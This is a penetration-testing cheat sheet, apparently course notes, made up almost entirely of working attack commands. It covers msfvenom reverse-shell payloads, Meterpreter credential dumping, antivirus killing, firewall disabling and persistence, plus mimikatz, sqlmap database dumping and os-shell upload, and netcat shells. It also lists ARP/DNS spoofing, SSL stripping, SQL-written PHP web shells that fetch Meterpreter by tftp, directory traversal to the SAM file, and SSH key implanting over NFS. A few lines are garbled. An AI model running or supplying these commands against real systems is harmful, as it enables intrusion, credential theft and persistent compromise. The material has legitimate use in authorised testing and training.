Metasploit Cheat Sheet

List payloads

msfvenom -l

I. Binaries


Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho


II. Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

III. Scripting Payloads


Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl


For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

IV. Shellcode


Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 


Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 


Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 


Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive 

your incoming shells. Handlers should be in the following format.


VI. Handlers

use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z


Meterpreter Useful Commands:



upload file c:\\windows





upload file c:\\windows





download c:\\windows\\repair\\sam /tmp





execute -f c:\\windows\temp\exploit.exe





execute -f cmd -c





ps





shell





getsystem





hashdump





portfwd add –l 3389 –p 3389 –r target





portfwd delete –l 3389 –p 3389 –r target





portfwd delete –l 3389 –p 3389 –r target


Additional useful commands are as follows:

  • msfconsole – r unicorn.rb

  • meterpreter shell

  • getsid

  • getuid

  • migrate

  • getsystem

  • run killav

  • run checkvm

  • exploit Windows7 Service Pack 1 msp

  • use incognito

  • run countermeasure

  • run countermeasure –d –k

  • shell


    • netsh firewall set opmode disable //disable firewall


  • run vnc

  • load mimikatz

  • ls

  • upload /home/user/mimikatz.exe C:\\

  • timestop mimikatz.exe -f "C:\\Windows\System32\\cmd.exe"

  • shell


    • mimikatz.exe

    • privilege::debug

    • inject::process lsass.exe sekurlsa.dll

    • getLogonPasswords

    • sekurlsa::logonPasswords full


  • run persistence -A -L C:\\ -X -i 10 -p 443 -r 192.168.0.196

  • attrib +h c:\autoexec.bat //make it hidden

  • Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu)


Burp Suite and sqlmap

1. Burpsuite -> Intruder
 http://www.site.com/section.php?id=51

2. sqlmap
python sqlmap.py -u “http://www.site.com/section.php?id=51”

# Discover databases
python sqlmap.py -u “http://www.sitemap.com/section.php?id=51” –dbs

# Find tables in a particular database
python sqlmap.py -u “http://www.site.com/section.php?id=51” –tables -D database_name

# Get columns of the table
python sqlmap.py -u “http://www.site.com/section.php?id=51” –columns -D database_name -T users

# Get data from the columns
python sqlmap.py -u “http://www.site.com/section.php?id=51” –dump -D database_name -T users

# Upload os-shell
python sqlmap.py -u “http://www.site.com/section.php?id=51” –os-shell

# Upload a PHP shell
-> b374kshell.php

Netcat Shell and Persistence

# Notes on Cybrary “Advanced Penetration Test”
Opening a command shell listener:root@kali:~# nc -lvp 1234 -e /bin/bash

Transferring files:Redirect output to a file:root@kali:~# nc -lvp 1234 > netcatfile

Send a file from another terminal:root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile

Automating Tasks with cron jobsAdd your task to one of the scheduled directories

​*For more flexibility add a line to /etc/crontab

Information Gathering

# Source: Cybrary “Advanced Penetration Test”

*Find as much information as possible about the target.
*What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?

(1) Google Dorks
Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/
Example: xamppdirpasswd.txt filetype:txt finds xampp passwords

(2) Shodan (Python API)
Search engine that uses banner grabbing

(3) Whois
Domain registration records
root@kali:~# whois ________.com

(4) DNS Recon
​root@kali:~# host http://www.________.com
root@kali:~# host -t ns ________.com
root@kali:~# host -t mx ________.com

*DNS Zone Transfer 
root@kali:~# host -t ns zoneedit.com
root@kali:~# host -l zoneedit.com ns2.zoneedit.com

DNS Bruteforce
root@kali:~# fierce -dns ________.com

​(5) Netcraft
http://searchdns.netcraft.com/​

(6) ​The HarvesterThe Harvester automatically searches for emails etc. online
root@kali:~# theharvester -d ________.com -l 500 -b all

(7) Maltego
Graphical information gathering and correlation tool
root@kali:~# maltego

(8) Recon-ng
Reconnaissance framework
recon-ng > use recon/hosts/enum/http/web/xssed [recon-ng][default][xssed] > show options
recon-ng [xssed] > set DOMAIN ________.com
DOMAIN => ________.com
recon-ng [xssed] > run

(9) Port Scanning
Nmap
root@kali:~# nmap -sS 192.168.20.9-11 -oA synscan
root@kali:~# nmap -sU 192.168.20.9-11 -oA udpscan

Metasploit Port Scanners​
search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP connect scan)
Use auxiliary modules like exploits (use, set, exploit, etc..)

Vulnerability Identification

Source: Georgia Weidman, “Advanced Penetration Test” Cybrary
Query systems for potential vulnerabilities

(1) Nessus
Vulnerability database + scanner 

(2) Nmap Scripting EngineVulnerability scripts
Listed in /usr/share/nmap/scripts in Kali 

nmap -sC 172.16.85.135-136 
nmap –script-help=smb-check-vulns 
nmap –script=nfs-ls 172.16.85.136 
nmap –script=smb-os-discovery 172.16.85.136

(3) Metasploit Scanners​auxiliary/scanner/ftp/anonymous 

Web Application Scanning​
(1) Dirbuster
Graphical tool that is used for bruteforcing directories and pages.

(2) NiktoVulnerability database of known website issues
nikto -host http://172.16.85.136

Manual Analysis
*Default passwords – Webdav
*Misconfigured pages – open phpMyAdmin
*Port 3232 on the Windows system – sensitive webserver with directory traversal

Capturing Traffic

Source: Georgia Weidman on “Advanced Penetration Test”

(1) ARP Spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.20.11 192.168.20.10
arpspoof -i eth0 -t 192.168.20.10 192.168.20.11

(2) Domain Name Service (DNS)
DNS Cache Poisoning
hosts.txt: 192.168.20.9 http://www.gmail.com
*Restart arpspoofing between gateway and target
dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)​
Crypto between browser and webserver
Can’t see credentials in plaintext

SSL Man in the Middle​
SSL Stripping​

iptables -t nat -A PREROUTING -p tcp — destination-port 80 -j REDIRECT –to-port 8080
Spoof the default gateway with Arpspoof
sslstrip -l 8080

Exploitation: Basics

Source: Georgia Weidman on “Advanced Penetration Test”

(1) Webdav Default Credentials
Default -> wampp:xampp

a. cadaver http://192.168.0.190/webdav
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit

(2) ​Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT ““”””” into outfile “C:\\xampp\\htdocs\\shell.php”

http://192.168.0.190/shell.php?cmd=ipconfig

b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

(3) Downloading Sensitive Files
Zervit 0.4 directory traversal
nc 192.168.20.10 3232 GET /../../../../../boot.ini HTTP/1.1

http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml
http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam

(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail
windows/pop3/seattlelab_pass

(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution
unix/webapp/tikiwiki_graph_formula_exec

(6) ​Piggybacking on a Compromised Service
VsFTP -> backdoored
Username ending in a 🙂 spawned a backdoor on port 6200

(7) Exploiting Open NFS Shares
NFS on port 2049
showmount –e 172.16.85.136
ssh-keygen
mkdir /tmp/r00t/
mount -t nfs –o nolock 172.16.85.136:/export/username/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/